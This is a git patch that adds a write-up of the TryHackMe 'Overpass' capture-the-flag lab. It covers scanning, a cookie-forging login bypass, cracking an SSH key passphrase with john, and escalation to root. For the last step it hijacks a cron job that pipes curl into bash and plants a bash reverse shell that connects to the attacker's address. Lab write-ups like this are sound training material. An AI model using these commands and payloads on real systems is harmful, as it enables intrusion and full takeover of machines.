From 89cd7d54068e1bc3c3096b1d4d93ce202917038a Mon Sep 17 00:00:00 2001 From: AbdullahRizwan101 <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Wed, 11 Nov 2020 21:24:54 +0500 Subject: [PATCH] Add files via upload --- TryHackMe/Overpass.md | 165 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 165 insertions(+) create mode 100644 TryHackMe/Overpass.md diff --git a/TryHackMe/Overpass.md b/TryHackMe/Overpass.md new file mode 100644 index 0000000..d880af8 --- /dev/null +++ b/TryHackMe/Overpass.md @@ -0,0 +1,165 @@ +# TryHackMe-Overpass + +## NMAP + +``` +nmap -sC -sV 10.10.124.118 +Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-10 22:35 PKT +Nmap scan report for 10.10.124.118 +Host is up (0.18s latency). +Not shown: 998 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA) +| 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA) +|_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519) +80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) +|_http-title: Overpass +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +``` + +## PORT 80 + + + + + + +Download the file to see what's in it. + + + +There's also a source code in`golang` let's see maybe we can find something it in so we can exploit that binary. + + + + +## Gobuster + +``` +root@kali:~/TryHackMe/Easy/Overpass# gobuster dir -u http://10.10.124.118 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt +=============================================================== +Gobuster v3.0.1 +by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) +=============================================================== +[+] Url: http://10.10.124.118 +[+] Threads: 10 +[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt +[+] Status codes: 200,204,301,302,307,401,403 +[+] User Agent: gobuster/3.0.1 +[+] Timeout: 10s +=============================================================== +2020/11/10 22:50:19 Starting gobuster +=============================================================== +/img (Status: 301) +/downloads (Status: 301) +/aboutus (Status: 301) +/admin (Status: 301) +/css (Status: 301) +``` +We see that there's an `/admin` page + + + +Looking at the source we can see 3 javascript files , we are interested in `login.js` so let's view the source code + + + +This is a vulnerabale piece of code that would make authenticate a user with invalid crdentials if he has a session so let's make a fake `SessionToken` with a browser extension named `EditThisCookie` + + + + +On refreshing the page we will get the ssh key for `james` + + + +But it's asking for the passphrase of `id_rsa` so we can get the hash of `id_rsa` with `ssh2john` and crack it with `johntheripper` + +``` +root@kali:~/TryHackMe/Easy/Overpass# /usr/share/john/ssh2john.py id_rsa > ssh_hash +root@kali:~/TryHackMe/Easy/Overpass# john --wordlist=/usr/share/wordlists/rockyou.txt ssh_hash +Using default input encoding: UTF-8 +Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) +Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes +Cost 2 (iteration count) is 1 for all loaded hashes +Will run 4 OpenMP threads +Note: This format may emit false positives, so it will keep trying even after +finding a possible candidate. +Press 'q' or Ctrl-C to abort, almost any other key for status +james13 (id_rsa) +1g 0:00:00:03 31.13% (ETA: 20:37:40) 0.3125g/s 1444Kp/s 1444Kc/s 1444KC/s play646..play47 +Session aborted + +``` +Then `ssh james@ -i id_rsa` + + + +## Privilege Escalation + +Host `linpeas.sh` on local machine and transfer it to target machine + + +I didn't find anythin with linpeas so next thing that I looked at was a file `.overpass` in `james`'s home directroy , reading the content of the file it was gibberish + +`,LQ?2>6QiQ$JDE6>Q[QA2DDQiQD2J5C2H?=J:?8A:4EFC6QN.` + +I visited https://gchq.github.io/CyberChef/ + + + +This password is for `james` but still he is not in group `sudoers` + + +That was a rabbit hole then check for cronjobs + +``` +james@overpass-prod:~$ cat /etc/crontab +# /etc/crontab: system-wide crontab +# Unlike any other crontab you don't have to run the `crontab' +# command to install the new version when you edit this file +# and files in /etc/cron.d. These files also have username fields, +# that none of the other crontabs do. + +SHELL=/bin/sh +PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin + +# m h dom mon dow user command +17 * * * * root cd / && run-parts --report /etc/cron.hourly +25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) +47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) +52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) +# Update builds from latest code +* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash +james@overpass-prod:~$ +``` +looking at `/etc/hosts` we can change this localhost to our local machine's address and add a reverse shell in bash with path `/downloads/src/buildscript.sh` +``` +james@overpass-prod:~$ cat /etc/hosts +127.0.0.1 localhost +127.0.1.1 overpass-prod +127.0.0.1 overpass.thm +# The following lines are desirable for IPv6 capable hosts +::1 ip6-localhost ip6-loopback +fe00::0 ip6-localnet +ff00::0 ip6-mcastprefix +ff02::1 ip6-allnodes +ff02::2 ip6-allrouters +james@overpass-prod:~$ + +``` +Now making directory `/downloads/src/buildscript.sh` + +``` +root@kali:~/TryHackMe/Easy/Overpass# mkdir downloads +root@kali:~/TryHackMe/Easy/Overpass# cd downloads/ +root@kali:~/TryHackMe/Easy/Overpass/downloads# mkdir src +root@kali:~/TryHackMe/Easy/Overpass/downloads# echo "bash -i >& /dev/tcp/10.14.3.143/8080 0>&1" > buildscript.sh +root@kali:~/TryHackMe/Easy/Overpass/downloads# chmod +x buildscript.sh +``` + + +And just like that we will get the reverse shell as `root` ! \ No newline at end of file